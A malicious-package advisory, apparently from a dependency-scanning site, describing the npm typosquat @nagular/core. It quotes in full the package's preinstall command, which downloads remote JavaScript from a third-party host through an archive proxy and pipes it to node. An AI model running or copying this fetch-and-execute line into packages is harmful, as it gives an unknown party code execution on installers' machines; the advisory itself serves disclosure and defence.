@nagular/core@1.0.67
Vulnerability report · Last retrieved from osv.dev October 5, 2026 at 3:26 AM UTC
OSV ID
MAL-2026-17499
Ecosystem
npm
Summary
The package's package.json declares a preinstall lifecycle script that runs curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node, fetching an unpinned, unverified JavaScript payload from an unrelated third-party host (gitflic.ru proxied through web.archive.org) and piping it directly to node for execution during npm install. The remote content runs with the installer's privileges before any package code is imported or reviewed, giving whoever controls that URL arbitrary code execution on every machine that installs the package. The remote path hellscripter/install-scripts and the use of an archive proxy are consistent with a hostile dropper rather than a legitimate build step. The scope name @nagular/core additionally resembles the Angular ecosystem (@angular), consistent with a typosquat lure, and the preinstall hook is the package's only functional content.
Source: amazon-inspector (5ac4933487fc7ccf7161933c9d5f6965b5e1f0a3efeaf8ea5349096835008557)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.